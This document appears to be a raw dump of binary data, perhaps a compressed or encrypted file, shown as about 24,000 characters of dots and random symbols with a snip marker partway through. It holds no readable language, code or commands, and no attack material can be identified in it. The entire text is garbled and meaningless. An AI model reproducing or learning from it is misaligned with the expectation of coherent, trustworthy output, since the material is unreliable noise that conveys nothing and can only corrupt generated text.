V.G...-:....W..a.).>.qu..)...u..u..M...[...8.@..........".YE.....U..VV..T.^...............#..}.^......n....o:Q.%..;..!.E...ND.v...$'.....8$b.H......e.w$......\G...........wv...E    ..A..6>h..(    .Vm...xsb{...xkc..'.......[.....9....z.H.i.H..U    X2....)...c^h
..r..Hn..$.j......Ig.zd.../dnZ7Y`.%..#....../d...!I(#.F..ph..9......L,F?...>.<.<....U..)..Z....ql+...UeS..d..!?6.p7.....y....5E... ..a.4...sq...D....j.....l...j.+.....$.'.I./..........'.AZk.(.]...".Q..n.c.k...........d).........l..E...}m.*8Z...C..RB...%
..4.vD.\.n..6......7.;......&..2..JR..L+r....,......F~..rUe    l..D.....MWv........._.(.. Q..!.C.[0hw..1v=...^gv..Nh.....T..`M;.M..K..>cQ........O.P........ 7.Y.e..3...rY..b...Eb;....kUz...w.XZ..G.h.....$$/HZ....[.J%b....m.b.......t]R....5%..S...9&.7....X.<..i.Ap..a?...=)..(.C..5....M.iu...-O...^C..8...n...PE...e....B....'....s%...G..b}..r ,^|.......Ga...b.?..~.pa...-....?%.(....Z.=....d..<B..+...d.....:[..Y...X....8.........=$.j^$.C....c.D.Q..dc5.OF..2...{ZP....:.T...vX.y.....^..<....~J...l..    Y........7'#.c....5.B..S?.A.^?G...4..@.H.FC.U...:.......Rt}.N....N"...vj=u......nYeI#!.il...A;......5+.t.G...QC.@y.5.o.U/_.b50..Va4.A.L..........{.iX..5..........D....,........"k3.7Q
.....4.x.B.\.....
...6T..]...W1}..p.!y.S....!.XcA..a..rY......J..O.....3..h.../C......G.L` ..p......(.8lK....+R.......i.......{..|..4.......3.*....J.v.!.a1N....}A^..!t.....O.<.p....L.t..g...eTR...#e....Hz..L.:R..~..1l]..@..F.,Y......}.p............`...*...T.."4o4..`...K....[<    iO.?gDPZ.:BJ...........@..t.zXbf.Y.&...._.q[vIq...~z.....J.Z.........+1...R4O.d..-..sB..\W.f.....h..'........Z..I...O0.<..p..R.    H..........(CXj{......:..    .n..h...M.a..A..........".n....VO.2.....D..V.(..)..j.....L......W...M.eh......&y..|<..(@.d....    ...z....i.G......E.":....-s..tT..jj......2.UB....~.ds.n.r...e..~.:.....B}    u......._.67x!.>.Y..>~.~.;B...3......o`6/.....w..<g..j1@U....../X.$4Z.4..N:j.z..&.l.X=..&....*..3.,N...a9....i..\.u.........'pV9/.....3.S.h8....^.......>K.89......e.}g....(...DX4...=.......9....).y.luL..L..8......c......_..&...s............/ia.x..148.9L..4FH...z...@.../.$.y."........,....<:.:E.k.ii.D.w..C8.W.5..'.............1.    ...M..Q..g...\>.....&...W..J.m...h..~."..!..g.....i......LC.....qtL$.$.vz..h.6v..r...^j.s....c....c&.sF%d9...N.."%.X..<...!
S"a...k.|o..D....ec.'S.*/n.s.8............W`y....Ug.......6(.....@C..T...V...B.
7M.-3.*.F
......F...<........%t..|x[..Pz....1.&..h...S...;pb=M..f.<..?..../A..7".........r..
j......M.jQ..~..&d.Q.O[.L.+E.NL..r,...lO.;l.....1...j].:.~...I..U....P...a.I...U..0.P..'Y+..~...u....O3.l..%........H .T.E.u..
.u.a5.....'.....z..2..!..Y\....1~&~\......$..*........I..X.....$.>U^..xs......-.n.2v'@kq..8.C...V.^.Au..    ....Gn./.N.4.8..fm#.t[J......M......bH...??S%..S..
...;........r.*,.....k.i..WK.2.?......Y..x.S........X..$.uk.....q*.f.G(..[.%..Dk..._A.ts6[...p.F.U;!E.....'9$_M..O..,....?...e4...g.....hF..c[%..?...sc1..s...d....+..5...u7.eY ..I[X.[}...v.xd..j!...|..mEVk..|.<..o...\[1.C...m.k.3./Ad8    ~
..ib....~...<kl;.\.W....?....H..m.E4.O1..V.C..Xn.^.Vh... ..}..
.....Y....,."{ .......Q.......$XR.sxkk(    #.....M..0...bl({......    I..^.09z9.l.._nd.....q:3...F).i}...lh./z.....    ....|.m....6..5.k...?;G.......ItgU.....g.Pxgxq.,...py9a...>.H.g..x...d4.}....9.~d......k...@../..O..5W.A
b.1.V.;....(.nW\23<...l.#._.Uw..
?.H.t.>...w..Bs.......F.....z..KD.o..~.9t...k.k.]....9..0X...b...i|...Q.=..$l........w..N.4.1....Y...wTu4:..t..............*P..q{J.K.....@....)V...^....\.5.....j...M?..........}..n.M.x.Mw.=..;...yk.k    {..x?-......l..u.|k....    ..vRSDX...*....~.P..aIb...... .q..Uw...Sg?C..!.r.........E.J.G!0.....(..8.ZK].....g.(........Y2............:....w.W.1...Gk.3T..M....%.Sy#h+..)'..OE...[/7}.js..}@....F.0....f..l....tK`..=....=R|.....>=?..-...4.l    ..X.(..`....w.... ........QX<Q5P.A..Fg...?lh...H.BG.....GE......."&.w)|?D.b.Y.....&V..elqV1.....{.o....@+i.........%R.E.....!I......d.d.'.7?...~,.Py[. .s.y..,..
n..M.!|..*.......F>7..u......^..d.........h..V....x..}.E...P..L3..Be.....B.<.L...e4...g.w...
..{.....V_..yX0.W-.R....{5.}.>n....._..#.8...G]...*....2..d.d.#dh....2...n......9?.l.u1...l_Q...{.C. .......0........;.PT.!RSn...../.....9........>0a...a.9..M..ihf6P..4...    .2d...'.........|z>AK...-0..[mt........[...h...+.f2..V...>.....37y..V!..~K...m.t..7(
..u..........Q....|........l#..)D....X6&.w.y..YE{X.Q[.,..U..c{H....    PkA.|.
.RJ...d2...w:..^.....N%    ...tKcCw.o.=..Sq.g.......NGfd.m..e.b...`QqHl.w...m.`H...r...|M.b..=..o...........go..#O.2.?uXW..~...........M.................Vj.......5.I p......7#..`.y}D..Z.m.W@...*T.
..}Z....bcm..Y..9...j.....55.@%....>.....#9.yv......}..,.(>.N..g*!d..0h.).....[.'...h....Pb..|].G.d.??.. ....,..(K....(....\%..Ye.)3.i.......b`...[}w(.N..    .e`...||T...f...3.[..L.?:.K...b...........,.i$Ji.B._.T    .....z=.+....B...D..q...(.8....Hv..|.z9......= t..q.9..q..W(...j...c...bUvT2IS..~yzjZK$V..l!...0VW....`h.....Q96.....&R.....{p.#.J....v'...g..o.6).....l.....>.....o.1...s...q...k......S..j.s..K
=.E....!1..........=p.2.....on..$.t8GKR......8.`(/.9...B...
....9k\+.)..d....H...&lV.s........2..|.".%..F._.}..w..:.W..WWc.....g8.&......ia.e;.&...[7r.^.....L{.A......P..$k...R........k7.J#..6M...-).%K<.dkR.bA.s,9m*8.n...p...7....B.FoW    j.....r..u0..b..k...R.5..q..=...J...|8K.J.?...7D_.8u.s&......m.......{h.z..d;#..m.te...V\.......s...,....Y.E..........    .^.

4...1BU..t.V.[............wA...j;gVM.....I..l\f.X..>eG...^..8..Ny...f.b......90..jq2.....Z.!4...H.>X...}m.<Z..3.<).....p.Y.O..m....z"?...+s...
w.~..{.......7..eE....P..p.?`Hv.X..kIM.....&O.,W.\...*. XS...Pf..h.|........^.    Z
S'.
...w.<..\......NW..fw....[!/..9..CY1.}    ..".)J6V.)..xz...|..#Q.W$.. .R..k.....3.=....X..o....1F.uq.Y.\-...;..-}.
.p&O.&tc...(../B?..X.B_.t....l.......~0.".C.`J.VZ.kN_P.`[...F.t.3...9l<b*r=...9N..R..!z..}.......H...]....^6..]......_.o"g.d...B...eb..7,...g...j...K..M......<!....J....`2......J.i9.n.u..><f.e@%k...XkH..:.EJ....ds..p.<.zz..t..*F..u,R.....z.v.... ..6.>..7/f.8g../.KI..\Z.r...\..<.j....m.....u.O..lw.Xn..=/VZ....!q.............W+>).h .]........u.(.`.:W...I.'A..q.@...=..R..Qy....xJ...L}...*.;};jWq.0)....o.*...`...O'N!..o...U...gD.`.....p..S,..2.R\..f._.H.6W,.'.....'F..v..+.'V...+.....?W .&..Q........?u.0..>dcR....0x.4P+.N.h.../.#.{3>D....w    ..}\....ex.Pg..G...@_:lJ.x....%gP..i...q. ...._{7Q.B(.Tx.FYy..T..._c$..L...G...F..l.......8G\W......P7v....(.Ef-3............@u...G=A..r.p..%9.).[.4|F_..f QF.p.xe|...q....2'..3...7...z.>..%.$.)$o`..v    ...:.9...............K...PE.|......j.s.E.?..&X..3..F...M.l.E...n....D.e.)..W..j..\7...}Xi....wP}....U%...    .".P.I.ct.[.-.(...V.B.R}....xC............}.=#U.......!..p..h.0.....((f.e.vf-q.2.......$J`..].Q.=..S................Pe?..G...*.....)...*:.w.$.s.@.. ."!....E.....)Q.    ....y..g0L..w.&.-...........R...H.......:...~.....sP^J.@Z..eL.".7v~......6..Z.m?..,...5<    ...q.R.>............=...ZP....../...D..$...l.6..<.I.. }J0bvc*3x.9<._.5[T.j.....E>.t.l^.+F.2`..C%...4x.$..j{....C.S.7......j.*9..1....?.O.Oo.p..8N..~D...=;..Z|.H.........2Tn....VN.e!..^..}'....JX.\...a>..
r....d<...6.R..O.|....L$.......%..ck.|5.b.Z..1K.m..5"g.&...RC.|P....:Z.m..U.Y.......zj....O....1..o./..U4......ROs.<... ...R...w...d..j..../.......M.+)j.......k.a..yG1..fd9...........C.uh.b...'...A...J._e....9....df......Z...{0..S&^..@..V3RI.y..VOQIi....._.~'7.c|"...ph!MV.6...!hg......o.YQ.}......C..........:.$.\.    .%P.Z.....<Y..:a.:.`X.gQtP.UR.......7!..... .....i..j)p.1.....[,.W.u..`..QK
e....._...W.    hn/8.v..kV..>..    .Tx.9...2.j../..I.T.C5..l-Dm........350.`..\..|    .O._..g!j........{....zeA.....r;.}. %.Z.V~~bo.N....+...........I.f.@.......x..y..>/...,XTQ....S?...=9.N..|Di\R/.4......5.....Gttg[(%.d..@.....{UGo_z...c..=^.c..LP....sx....l.f3aj..^J.M..|.e.{.L....I./.............I..'e.......R...E.%4.N.$..........Eq....."g:......8.h....!....]z........4x..k.....C..o..]..d.    .(Dr.    {..VA.........m....s..O...-.{xc....}..-....(.......k.........>....7....q.?...n.;n....2..l......#yx.V..I......}3r...-T.7.O.?.\.}...E.&.=.W.-.$.L...*Ur<....."M.&.Ob..)....i^..?.-<...pn..F..;....l....Qn;.A.l.k....C.Z..t..,9?...K%.'.`...4...TanZI1..4C.......k
........../.....u..YZH....1b..Z...0..\....%^o..d.b.*..~..;....0.3..U)[.r....P...."..vb$..nz.6..E...@....R.;@6CQB..%...|............c.s.,,k...%z|.............yp...[1.b:...?0q+..;..a2......q..|{...G.q.:.91,.....,.....k...g.->..@.s^......T.....g_@?...T...{:...p.8....Mk.0.....4p..`...5...UY....$......#....'..9._Wp.*IM..M...T5....A....A..z.".[-.O.O.KI..kE...o.\T@T9X..#fK~.....G....{..    ......k...l..8..:...KS..1k......B_........4..d......P..-S......w/..p..~Gk.V....&ervRc....?.../.0.z.F.RS.V.q...:.W.....&{)<9.tC{.........2..wI.q.bE.M .a.......v.v..OW?.....U..O...#..4u.'..<...P...
U3..x.>j.s........"...1NB....@..B.`7.dg....FF.....').:..z.kK/.Q.................c..rG.......Y.........f..ir.........-Y...Ea%<|q`.....!    ...lA...nu..~./0. Y.)........?......S.....{.s&OX...M.1.d.(....$p<...........JH....^..=...E...R...H-......{.ze......."y...
...6.._=.#5..~...f4..:... .    .v..]F...v.N:.q..<.......n...N..n0S..WS..}.<.a!.....B#K.*E.....n...0J..\......K.#.n.u\..3W.....
..u{. ..!..K.T..>7|..j....X..........Xu4+.m@L...S......x...<.F.],2..*.n.(..{...=k..\......`...c2.....*.3G#.m.a&..5...\..Xf...u!..zL......AgC&.>/....m..%T$7-.i..- !..p2.m..\..E&",...'...u..w...ex.s..,5..ad......4k$%..;1i".if....h...^HPr......Bl....."!..M.....|R....-.f.t.......o.k).    'G.<....o.^M%I..Nu....R.....P`.<..~e..J+(..;..D.]...=...J........>".
?1k...Z-.%o.\...sx_..9@J.Ap_.....-j.b(>...@...G.P..........jP..a.T....g.R..b..\.A.$L........|E..S...rd.kUB...5.SC...H..i.a6.'AU........$..I.V'...>;...u...Mi..W.D...w}.Q+..v..QiPrb8p...z....v...M..s.E.T...U..-...W..O......j]....G.OiQ....N7[.!.`+4..N.us.#....).{.1......ZVw.........S3..0!......B....g,.[.=...9......+.42....2.]...$s.y.......g./1..M.].....Z.?Q..b{......m*:[.....$....t-.x%.:............9i*..:FnI.&5{'Mz....p_....,{......`.........$nD.K&&)...Ya.....e..2..x3& ...t._M...F..w.}.|.&1)    .L..I+.^...6..[....;.7eEw......)b..^....*..VI.62..u....woS..+t2.J....z.P..Iq8....]0.{..dc..}<#.....0..P.
..T.+
.- k..r.u.......c......N...[...?Jqu.....J..'..........uFm._o...E&..R."[..+..............G.\.LL0...d.K.....5[.....)K(.&.N..K..n..+.k...kB....._{....$...Q)..!.}.x.W.*.`c.    1. .......... .dJ..TC...x.5.......E.L(..n.3b*.=.......(LLE.......Kx....h..p.{+.h....C.2.RU....U.A&..|y...p[...T.....o.x.....b..D.k...;FF>V.Z..pM.2.q....=p....Uz...@...Zp......6.....Fy...p.Yn.....D..^.7r....dC#x.Y.H:.c.s.C]..yd..N...s.."...B.*..5o....3.0..    ..S%.*...H.....5..V.5*[.../.Q..2..xQ.M.m.    .....@..4A..(...^.._.l.G...[..;...XIt
o..m.i{v@.? ..6e$v..Gy+.*A'/1}..5...t..JA..a..&,&..........X......L..`...... ..Y.gOH..u..N...&v..t.g!.I:.dH.v.".t...U.B...9...-lU]c,.........+..h..~hs$.X..i...F./.A ..$~t8&...Bb.X...Z
....N....../...8..^...xs.J    T...1........d.6.&c|........&zo.".Hhp.?....K.=..9.s6.......XF.Y..,..v..`.C!2...b..;p{ @.............L....=....I.........ADpL.m..J.6.3XRH.~...kh.
.....6.+...o.9<G)n.@...#..a.....ldP..........."......6^{.E.5.;.H.....n....\JB...,..3..>..Q\l......r.1M..B....>d.,..p.yv.........ll O1#+e.^.p......`.......>.:w..%M.=..:w.ui.'..w..e}...,....3.....{..!..}.s....;]...zx..+@y4j..X.U.Wuy..7zJ@.,.....5....I....X.1.~C.X#.......Y....X_.n.d..4@0..................../#j.`.Xtz..c.........~..?...t.8....>i.    ..OZU1_>.$..$.    .y..4.2f.k.r"..-..IW...z..)..K..E
.N...    7H)VE.%....)(.Y....1
...+t....."..t.6.A..5%3.
.5..d.M...k.....y...u...Pt..I\....C....!............j..8a3.R..\.]E..z.v.r.q.K.._!..........r0.._pUU....!.\..7.....G=.QU.~.......:.o.I.nx.....=......T..&3e..gC2...M....A.&K..XF6.72J...G...%./.C.a.s.t#..j.........A...m.*....d....i.......*..iC..Vr..8.bV+...w...!..m.z.E@.W......,..f....*..P....o#]o.{.YLD.<.3.q..}n.Z.r..I...TL.5!.]..$5.E..........t...........N../..S.&..fn.;.k.f.@l4..k..{.S..8..<.T....w..m.f.$...e...L...^.6]N..=.y..M.{]...UI......"V...ML.|.9..........3;'..3...[/...$..\=......2=XNqZ..n..V....!..R...S../.y.nPxc...l.......&.......$./.r..Wau...1..4....c.........|...O...Q...R.|S..X..t....i.X.d.
..l2...........6...79..m...c.......6.eS...t.......33....x.....2..xM'....vMn.?]YZK....`.M...n...<..S..]8A...+......
Ja..:......?....}<...-y.....`...F.D
Z.gS..l......N._....\....FP..+S.....2...J....x:bsO...P......L.].....L9.h..]..PK.a..K..C.v....&..a,.Y..bH.{......'Y ...t.._..5S~Ca%..w.........o\.sg/.Qo$.:....h%z.....=..J.P..cu.W,....6v.s.&........u.i_..w....BCj....S........)u..h)..I.1.j6E.>..)..s7..E....+.....~."L.~d~W....]X%e.
)8.../.S|[2..)<.. .....|H....5..N..;.......!V....J.m.b.N..D...E..F..6m.9j.4.v...h*.W...O.7F6.*HPb3...bR.9.._.l{....
....b...]qcZ.Z..eo....4..#...gH08g~...|............zW.k...\.....j.@.s........HY..(.v3S^.w..0..7...e....s......[O.Q...+..a..@...+z..._.Y....Qe.o....'.z.%6..-)...i.k....Y.v"H.[.18a.b#Y..l..p..@.-..8..0%U .....S.rX..    (.?...b.q.....)    .q...0..3...V.$...*..a.....X.AS|I...Cje%...X-.^..%.$.Ls...{.dj.h.#....L*..J#..E...4H.RP5...m..F....Y....p........SlBv.;|...~.S..5f.O/.R...........j....g.2w@y...h>.X.Lg.fs_..E.wr..z-.....g...GX...a&./..q1TNM.x.....1.../.|u)<...gV..#O.{...X...W<.y...P    ...#....r?j...3T..-..O.9m._!..R.K>....Bb.+j.Ne...q;.8aFq.X.I....<~1....y..8..I......b.0..._J....}t..e.9.b.......D..j=.{.........%...OA5.d...K.....5@E.o...x!.'..h..BmN>...q....o.0b(.Fr..................u......:..i.^..{<>.W......F.<Xq..-.}.)gO.:z..Oa.....j.....7...!..%1.........>d....a_..K...lwy..dD....[,{.Eh.cre.F..
.......+LL....a..m.ur$J......QGN.N.X...D]........A.=...q...4.<..#U..>...L..iuB.k..).s.*..\LvW5.T.....Z.....X.g......%N.j....#.|kv....P..7#......v....1s.........{~$......"..6j..hFs...-(.@0.x<..b=...p.-....s.F....&r...1.=..Pk..o...Z.....~.......k..;..S.H...6&.fVU.....J..<)..c...R.jP.{V..:....6...V.../c4.s...L.H..@k..".,.E:I..K ..Ho.y(.USV..HyG-.G].........../].#.28.A.......d....AXG.........>.B...4.)i.......a.`.M....g.3.]ij...W.;OJ.$...d.............q..t..g.......1K0.0.]<..wY....^#.....c.bw...)n...N.H.....w.    .....~_d.T...b..#-......O..j....F.+...............%..........XO........._%6.W(...f[k................oS]."....#.]W.2z.0R0........9.
..S..".&E.<..".P.&(..m.....    0..r....q......,1...td.?.C..pU.AkQ..h.).ybA....y(.~.f^.....y1.h...I..p....1...\ ...B{z...#
>..;".+.?o....5....>DL.J<k..(., +,...!]..R.U=..V?#....:q....DJ....H...J.7.O.(..H1.y..B..m.......^..k..{y[.N..A.l..P.V.k..]......l).P.zU...:.....r.t.....C4......r..>..J.p..r.\..m..m.7..k..a...|.~.....8Wos..S.+K..5....y.h..r_.P...#?.Y....Jf..zY.t.i.....=.x.    a]!K.......i6sd...z.=.z...b ......P\;;....._...S....'.e.2.".=.....5.M]...c.~.%..6......v....l@H...........o.KG.).4.Y..q{.g.2..#$.....=.].91+a..*.......bm1...OO2.,.56.O..mw.[....t..R{..L.y.u    ..........DL....+.._7....Iz..
.@K..El...c7.Ib...`.....!4..H...6.$...Z....8?q~...MaZ....(....ciME...aM0T_..._U/.....%..Mb..........P.........X... s...ax.F^:...'"...7.....p..p9h.c
.h.Kj.!i|......../. .%"`|)j.6...A.%...6...}..r.fEb0    .w.....U...pbj...*.^...T{J~...g.m.....'....X...y...|.o..f.|....
4sdvX..:...!..[.u.(T    .d7    .g.F..0r.iz]...I......+.3..m.1._.I...n..MO.}.p...W1..G..e..I./..!.fW..9*.....e.Z...v..    ..1.C. .F..B...j.F=.:V.!..N.p.hy..F...{.....6...[..,..[...H.R.....Bg..........-.a.u.....$...3H..t."...pqm.V|.{N...o.{.."...t.Y...&. ^..S......<..1h<.B}..r.......j.j,_..\.....+a.r.a..e.n...W...........dY|.#sq....w.Q..J4.).m....3.Q.S.s.tB..7.............).}.P.a...<..^.-,nld&v.*P...k:.:..v..~3Y.D...qO.|........~...a.....X.....3....it)...3.P.@........]..#.G,.s`.V.Q1...p........V^......5....w&....<.)..q..s.......4.kIA.....i....e. .. ..*=.../Q    ...mK.!.1.:.{...7.D4~Vxs.{Qh.R..F.,..E..*wq.G.t.hMv.......rk..q...kJ.(.a...mN|..8.........E.#..x._Z........WW..K..Gg./.F....;..9...^_S..!..0i..\;..$J..E}8..*.|.....(..^9Kb..F...iS.`...B3{|.. `...#..Y.......94f{..m.z.{    ..@......(..?8.X..)aG.<..gQ.;b.bc..!....m.h..."2...    t|.K3...9....U..._...,G.l.......yKX...$\.SbnFxy..Pj2}...x..^...DTW.ZH.....~.u...|.L..C.........m....-..?..W(....;...Z..=..0S....|.)....2'..w>....Tm.....d.....y)Gfg.........R.........
.%.K0.I.S.TJ..6R..s.n..A........Z.?.+..B.o..F..GNg.'Bm.f.,...>\....8...'.`J.=.W...N.........A..c;J.yfg.^.V.R.=jOs..../...Ec.^T..,.Q...................RNB.n...H..>.....
'C............J:..`+...<'.X..>V...]o...X.c0....#...qG........L...m|.3.
...k.r....u..&PP........yB.P..e\.7.(...V........'./Tj...O.C.... .o..E..=+\....>.lVoN!'~..........k..4t....FN.'4%.........^.....~..7.t..N...".t'..e)\.[T........%>.:.C....`...
....C.3.<. ...0.4..P.).X.*d....m.%... 9M#..h...(..w..!&E..9..1.........m..=..q.>
...[SNIP]...
..........SKz.;.*.....$..7.f.....F.R(.......D..[o...Z..E...hO.....O. ...>..}.JR...u.Z..z-&.(..j..O.-..X..v..B|.
..>.W..zA.!..A(...jj..;E.N..0..k.`......"oX..l....E...K..p.K.. s.......j.g......N...p..<%....
.[ua&OE"...{..`.~_.w[......y.......B9.).R...E'.?.....bj..\.P...<.>m..{6.............1..(.q..;...Z..=#..1BHk...`W..S... ..q>b...M...M.k.y._.A..h..*\Kz....\I.'..Of...--..0.nT..P...N>.*...].8.-....>..t...y.m\z.... .......2...*..ba..z..!:,;>...y-.X}a./."]V.E.K'.:^..Of.V..G.....UL...=..w......[y......P^]n....X$Z..d.[.......l.. !.
CX..?X.^....=tH....wu.|KXhw..?.0c....z.).....(n.M....].}..B...G.-4.Y.hp.y..........a.....O.CSn~fQt.6T...%..~....V[.1.%.e.v`0.......:R...1B...]..p"P....#....Sd.....@..t...3......,#..
...l.J..u.    ..ZvQ@.x?E..5,9i.A..5....r%...p..1.
,...z.T..7.....O.V.M..3..2D...P.K..)..j.S..P-....d/.}.....Ums?0.........Mn..q....H.5...._..;'q.&0.y.]..$.h...eO"~..K.?<...X....M...g7z.p/.....y.:..,.s.h....k...o...c?wt.I|..
...k......H.....b0.r>^..'..7h.....n.M...2.6$n......f.yh...J5@.~Z..g.|V)n..U....&...XG/#.......#dLO...y.2......rY.lr. ........i..7..IpH..a.=.........    $..K*.3(.U............w.U...J..B?.`...."<.yS..h". "...ou\.....um5....k.....U..'...1,.P.O...xu-..VVm.x5..E..J.?<H.j.ZG...h...[.!.....J.    ....F..~#.....bC.a...:.'}..h..wz.|.6=d\..7#.L...>/    .<h..@.j...l..*:.y?3t.....}..9..x.....IE.8.i.U...x.m.&x.e.>q.<(..@[...........@.^...,..!.K...@)F ^*.~.z...YS..g.P_k...;k.SEF...Ek.{ui(-3.z.K.>[Z....A.ik.K.....%WzCZl\...;._+=.Q...Gvy.......w.....7l....".H....7..q.I.r....5.pwQ..0.v.>.lQ....A.~...pc.RM.$z/
.~.|.>....Vk..+.........p..r.a<.e...)a......H..7..4&f.q.3|C....p..U.B_A..V&h......G#.ML....0".s...$.Y....Z.C!..Z......n.s&w....].....G._....l....Ze$...2j.....}?c.Q.g7..9.....UT..v.F}Sc......n..v[..1U.X..z...kG....:.y.I?...C...=]a.......yd......i...3z.k.R.......*.[....Qe..x......2.....!4..q].f.}.P...
.<.@....V.6.m.t-d....v..pr...P.@........3~u.f.....y3..t.Zq..r.IKy.......
...    n..{A..=. .B.........n.,.L..n...z.RRjH.P..B..ph..l...T..;......?."O..G.............K.U.C    .K6....0:.U.0.2.X..R+..6$.~...9....%.....DM;w.....}....|........,..(....0:......~=..Os..@_MRB...H.>..]-...    .!X..........2.h..l.z$E.V....-Zo...g..B..>:...I.p...^.S8.dv...G.W...!R.).u.>y.8.{.rj............./.x.r:mp..2o.9xE...T..;I    ..{.CR...:..M    ~.T...`f.@.....Pvr...:.......#
.a ..a.o.+,.....XS&....o1....X.A..u.p_.............9.....3".......dL.swbI.K."...[&.....s...~....>..f.z.O.r...    d.X/....Qi]....n...
..........S.............0z].M..P2..Y.(...I...h.a..
..~;....{>....).....R.TaW.....~.sA.$..g.%..H.......|.~.Hia3........v....t.(.E%?).c32+`.'.6r!{.....o..h..o.B.E.....#."...9.W.a..~K.vv...Hi.=<.g....r..N].....P.N... 7.Ic..;.~.Z.*....F`.)....%.d..........5.m}...C..p......y...#...7.P...C..kc..5..<.D..DG..(m...c.Q......X.J....9...6....h.~.(#.awf..4n.3c...B._eo36..I.....tR....."#..l....R.R.....T.@...    |......k.J......^........`%oy..:...e;Vg....q..M...#....)...~m.|x...X.....I.s....3.j........C.p#Z...u.tS.[....b..n#Xu......&..\F...6..+..y..e....pt8.....L.............X...YQqw....<h=h.......(]..fl..c..i.G.|.,..w.963.N...{;..Z..a....p..W>...T...{.........kx.......8...O......A8....Q.}.....CVz..D.w.Y..F.-.{..q......w*{.6.B..l..2}...~$..J:w<..Q..a..+Z'..+..=.^.    ..]...".h.f........q4............`{..IB;i..R...<.....xdN.G.6.@9|RuF.c...~"...l.R.....e....[.L.0.....Y...%0....8.....$.-..u......(A........GC[..p..fr<<x....%.|.#Wh....Q..\..h.|...l.....h.l
.....3.<..V.*& .z.75B}.:VP2/....3W...    .......V..x]7dA..V.H.z..|(.    x....7........#...4o>\J.....&$L....2.?...];I.v.....>bY....?.2._.y._\...0\jV...........
_.:......e...k.FG.m..uhP.....cA.....r.......^..N7....<.    ..@t.#d;$..xe.........P...@.E$s.
..r.a.Zn.:.\........17p..L...vr.E...E.7.<.E.y.*.L..},.W(...,l...y......s...wf..X..T3
.a..:.....    ...Z...\.D......x.../.Q...V.....$.L.U.H.~.vT......,W%kWHjg...F..Z._Z..Nd.......,.X#.....T..v.O...F....}T.mA...Q.[....F.6G`......[n.\.k.    .>6Wg...u.zN...Y.-e....|/eFH...,wc.....G....x.cU...C.#.E.0...*..P.....+..)...o.Ti....!    q.....O..`.@L..1w'.-..........w......./..S.X.*.........}...1InK".Kb..|T.gc")..;..an..p.. BJA%..r..=n0.u.".(.jT=j..%.m.le.G...    .y. ....94.....=.'..7|..|........v..'Q..|aH|`i.....i..D.....d..I....    .]."..Z...?..N....\......9...Z.o.x...*.??.Ua..../.:.#'.>....&.........}W.m.$V...w.u1k!LA-.....8...k...J....L...1...    P.G...x0"...9........D..<....8.......7"...h.B{..i.i...?.1.##|<..
.H|i..Z.@..n#.@0._..a)..[......6w.........    j....O.k..(.....)..~ ..:X.n.me..qr...=+..e...0......Q....L..$y......B_...x}^.4.S... .%..G.....M.D.8..%.Q..*;6.J..x.p?x..+.....hQ!Fx.[.....(o.1aMJ..3#.!.E".C..cl...Xsj..K.)..n.s.<..A..[...-.QT..P.".....zjU\@8.g........t....^y.cU?.h.*...._<.i}.x.8.\..+.dN...=K.N......xpp?.ak.N@...E..6..y..F%$........z.........~<.R....B..{_...&.q..cZ..vc..%j3u:......*.yOJ    .....]r'q.ELc.F....%.#....U.t.....+|#?*P.2[hY..jJ@-.r.......d#h...
...(,.u......o...........7n..F..".M    .f&...S!xs.4AX...Z.n.3...f..5.+F....V.o.....J.8.Fz.~..............2Y.\..X.GG.'...F....i'..'.U.,...N....No..+....]..%.z...o.f.p.W..../..jI..b.><...x.-.......@.....~.....~e...$}......p+B.wB......j`/..H..|......^G~..r....6*8..k..4z..4u..;..;'e...D.p..........6<......K...B.%.....{....s
..H`.N...e?&.J..C6..".k....s.....Ha...O~.s9s.7..'}!..$.d.....%........w..T....m.!.by........9IY......L.z.|q...+..]..l'..L....\..................)I.q..[d`d.6OG....$..W2....Jy.ptZp.d...q'....
0.v..-....p(B.p.w..Ye..F"...V....@C...=....%..wq......RF1...
..d...ecl6......,...,..!a..."...2L.$....Z.So.A..:D`..%_.~.pJ....".d...A......4..k..:%.B.n^|Z...6A..|.W*.....1t.7.[....?.y.%/........A.j`f.P..?.,F..t........R..T}.R.;.......5.....bU.......aNA............&..d...D....O. ~..UA.};....4........B@..F....c.....z..f.{.....ngB...y    ...Q.......7.0..f.G......9.h..}q..Y.....xw.J..DNcR.)G.)...b....s..@W.........PFZ.5...W.H.XAG.@...ua...v..}.8u.oY.NPJ{'P^'Q..Yg[0.w...`.)-L>.....O....U...s..V....?:A+.......E(/ck.
.y...L]t?...>t7..o..='co.@...c..B...i%..2O....u.*..&..:U}". ..!..%.o.....q!....s..JP.!.()...:.Z.7..64.p..._...b.Qn
L.......F..x..'V#G}.E?B7L[.5.p C..S
..a........R.....c........H..+....M.QL@.G..v.......L:6.1L...-...y.y}wG.f......F...a    ......o
.LS....-?0$e....zDR..I...W....?>    .X.GX...Y.....E.._uF..~.3.s..^v....$.o..?$:F...G......;U.(..*.......7...Q.(E1...4......GC...E.Kv...).r......!+8....*q.c..>j......5......B.._..O.O.. 8.Gxn<.]..    .....^..l.....H...?.1....W........7..i....t.^.....M9.7Z).p..... ..wv..%h..m.3K
.}(.....9.k...".LN69..m...#VE..uE'X..C.gR..8.+....|J...'QA..;Q....y...`....g...u..gp&2V.Qa.|..
....!.!\...9y.
.W..9...8...J..GH.r.y.>.e.U..!E...YF..W>...S/vU(F.l...L..r:Y.i.=*#..l...mKf.....@hF.Od...u....<hlZ.A.M.T.U<..>sz...[A.p...zH..Hw:....>..F.xV....oo.3e...:...6$.x....f.C...+..t...".'.m/....~o.........c6L$!..7....5...C.9Z.j.....n.NH:Pzs.    ...%xV.HO.f+...'\cL.8u...< (.....<j.......}s......&...r./t@...P..a.]...:..JYJ...Hd.cQ.F;...dg;... $`Z....i.....~........i..nE..,......S....u .K.6......c...fk)}?F...i].@^.m....d]$...4...S.X.....B...!.C...?....gT.)....3v. ..h......t.....djU...G..<.v......YV......ip..*.ls...,:..=*..#.}..,..O.%....%........ 8g......].../5...s.]9L9{..~C........m.....H......5.......a.EXeN...].......xS...2@......F_...+ vK\...0...~r0..Q...Sz.0.l.b4..4.c.v.;3o.......uF......%...DZ.H.].]..i3...M.XIe..H.HW..t.3(....9..8.{.&-....[.ALW.8g.G...yb!c(7....n.L..j$W...|.~o....@.O...q    .Jy..|.F......l....#r.2..>S...]3..\....F....V}......r...B.;...2....c.@.\.;,K......H....m.+s.,..*...........S....i&w.....Bgc.O....H.vf..<....^d..*sI...>.=.L.@.....[.z..P.c....g.M.....R0( ..<..    .sV.@...d..h.-KG."...RaHu......#..\...P.... 